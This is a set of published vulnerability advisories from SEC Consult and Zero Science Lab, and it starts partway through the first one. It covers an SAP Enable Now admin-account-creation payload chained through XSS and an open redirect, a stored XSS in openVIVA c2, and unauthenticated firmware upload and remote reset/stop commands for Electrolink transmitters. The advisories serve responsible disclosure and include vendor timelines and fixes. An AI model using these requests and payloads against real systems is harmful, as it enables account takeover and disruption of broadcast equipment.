req2.open('POST',"https://example.enable-now.cloud.sap/!/user",false); req2.withCredentials = true; req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}})); ------------------------------------------------------------------------------------------------ We can base64-encode this payload and pass it to the Javascript eval(atob()) function using the XSS vulnerability in the file download feature (seen in 2.). The link could then be shortened to enhance the likelihood of successful exploitation. This can be achieved, for example, by leveraging the Open Redirect vulnerability (seen in 1.) to redirect the victim to an attacker-controlled website and trigger the above payload, making it an attack more likely to succeed. If the victim is logged into the application and is part of the Administrator group, when they click on this link, a new admin account will be instantly created. The attacker then can log in and has full control over the application. Vulnerable / tested versions: ----------------------------- The following versions of the software were found to be vulnerable during our tests: - SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022) Vendor contact timeline: ------------------------ 2022-11-08: Contacting vendor via secure@sap.com 2022-11-10: Vendor requested screenshots and steps to reproduce 2022-11-10: Informed vendor the previously provided POC contains the steps to reproduce and screenshots weren't available at that time 2022-11-10: Vendor confirmed issues are under review 2022-11-18: Contacted vendor to request an update 2022-11-18: Vendor confirmed issues are still under review 2022-12-01: Vendor reached back to confirm a Security Incident ticket was opened to the Engineering Team 2023-02-02: Contacted vendor to request an update 2023-02-03: Vendor confirmed that engineering had fixes ready and waiting on a release schedule. 2023-02-07: Vendor confirmed fix was deployed to production for ticket no #2280196564 2023-04-14: Contacted vendor to request update on ticket no #2280196563 fix 2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in May release 2023-05-08: Vendor confirmed fix was deployed to production for 2280196563 2023-09-27: Public release of security advisory. Solution: --------- Due to the Cloud Edition being affected, the vendor automatically pushed a fix in the production environment in the May 2023 Release. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF P. Serban, F. Hagg / @2023 </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230925-0 > ======================================================================= title: Stored Cross-Site Scripting product: mb Support broker management solution openVIVA c2 vulnerable version: <20220801 fixed version: =>20220801 CVE number: CVE-2022-39172 impact: Medium homepage: https://mbsupport.de found: 2022-03-16 by: Daniel Hirschberger (Office Bochum) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Support small and medium-sized companies as well as large corporate customers with just one software. Sales , inventory management , billing , e-mail and much more - with openVIVA c2 you get everything in one application. Without system disruption and in one database, you can do all the work of an insurance broker with one piece of software. Connect brokers, intermediaries, insurers and customers directly with our self-service portals . Strengthen your customer relationships and work more efficiently yourself. mb Support offers portals for intermediaries as well as industrial and commercial customers and tailor-made portal solutions for insurers, brokers and private customers." Source: https://mbsupport.de/ Business recommendation: ------------------------ The vendor provides an updated version to their customers. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from other security issues. Vulnerability overview/description: ----------------------------------- 1) Stored Cross-Site Scripting (CVE-2022-39172) An authenticated attacker with privileges of the role 'user' can create a new 'Vorgang' (Process). The field 'Name' is not sanitized and enables an attacker to perform a stored XSS attack. Additionally, the field 'Hauptverantwortlicher' (persons mainly responsible) can be used to assign this 'Vorgang' to another user who will receive it in his overview list. This results in a targeted stored XSS attack. Proof of concept: ----------------- 1) Stored Cross-Site Scripting (CVE-2022-39172) The application is developed on top of Oracle Apex (https://apex.oracle.com/en/) which provides several security features to developers. Two of those are request replay protection and parameter checksumming which make it hard to develop a PoC which only consists of requests and responses. Therefore this PoC will be a textual description of the required steps and supplemented with pictures. Additionally the library 'AlertifyJS' is used, which changes the appearance of alert popups which can be confusing if you are used to the standard alert popups. To execute the attack the following steps have to be performed: 1. Log in to openVIVA c2 2. Go to 'mein openVIVA' (my openVIVA) 3. Click on 'Vorgangszuordnung' (Process Assignment) 4. Click on 'Neuen Vorgang starten' (Start new Process) 5. In the new form enter the XSS payload into the 'Name' field, for example "<script>alert('XSS')</script>" 6. Choose your victim as 'Hauptverantwortlicher' (persons mainly responsible) 7. Click on the three dots 8. Click on 'Speichern' (save) The victim now has a new 'Vorgang' in his inbox. If the 'Vorgänge' menu is clicked, the victim is redirected to the list of assigned 'Vorgänge'. Because our payload is in the name field it is executed as soon as the list of processes is loaded. Vulnerable / tested versions: ----------------------------- The following version has been tested and found to be vulnerable: * openVIVA c2 20220101 Vendor contact timeline: ------------------------ 2022-03-30: Contacting vendor through email followed by a telephone call, sent the advisory 2022-04-20: Asking for status update 2022-04-22: Patch release is planned for August 2022-07-26: Statuscall: Patch exists, advisory release delayed until rollout to all customers is complete (~ August 2023(!)) 2023-09-18: Asking for a status update and patch download information. Vendor response: no public link available; few customers still have no patch. 2023-09-25: Release of security advisory Solution: --------- Upgrade to version 2022-08-01 or later. The vendor has no public download link available as all customers will be patched according to their maintenance contract. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Daniel Hirschberger / @2023 </code></pre>

<pre><code> Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device allows access to an unprotected endpoint that allows MPFS File System binary image upload without authentication. The MPFS2 file system module provides a light-weight read-only file system that can be stored in external EEPROM, external serial Flash, or internal Flash program memory. This file system serves as the basis for the HTTP2 web server module, but is also used by the SNMP module and is available to other applications that require basic read-only storage capabilities. This can be exploited to overwrite the flash program memory that holds the web server's main interfaces and execute arbitrary code. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5796 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html 30.06.2023 -- POST /upload HTTP/1.1 Host: 192.168.150.77:8888 Content-Length: 251 Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=----joxypoxy User-Agent: MPFS2_PoC/1.0c Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Login=IgnoreMePlsKtnx Connection: close ------joxypoxy Content-Disposition: form-data; name="i"; filename="MPFSimg.bin" Content-Type: application/octet-stream MPFS...<CGI BINARY PHONE HOME> -----joxypoxy-- HTTP/1.1 200 OK Connection: close Content-Type: text/html <html><body style="margin:100px">MPFS Update Successful<a href="/">Site main page</a></body></html> --- hd htm: 0d 0a 4d 50 46 53 02 01 01 00 8a 43 20 00 00 00 MPFS.......C.... 2b 00 00 00 30 00 00 00 02 44 eb 64 00 00 00 00 +...0....D.d.... 00 00 69 6e 64 65 78 32 2e 68 74 6d 00 3c 68 74 ..index0.htm.<ht 6d 6c 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 53 4c 3c ml>..<title>ZSL< ... ... 64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!..</html>..- --- MPFS Structure: [M][P][F][S] [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files] [Name Hash 0][Name Hash 1]...[Name Hash N] [File Record 0][File Record 1]...[File Record N] [String 0][String 1]...[String N] [File Data 0][File Data 1]...[File Data N] --- C:\>javaw -jar MPFS2.jar C:\>mpfs2 -v -l MPFSimg.bin Version: 2.1 Number of files: 1 (1 regular, 0 index) Number of dynamic variables: 0 FileRecord 0: .StringPtr = 32 index0.htm .DataPtr = 43 .Len = 48 .Timestamp = 2023-08-27T14:39:30Z .Flags = 0 </code></pre>

<pre><code> Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The transmitter is suffering from a Denial of Service (DoS) scenario. An unauthenticated attacker can reset the board as well as stop the transmitter operations by sending one GET request to the command.cgi gateway. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5795 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php 30.06.2023 -- C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board) Success! OK C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop) Success! OK C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start) Success! OK </code></pre>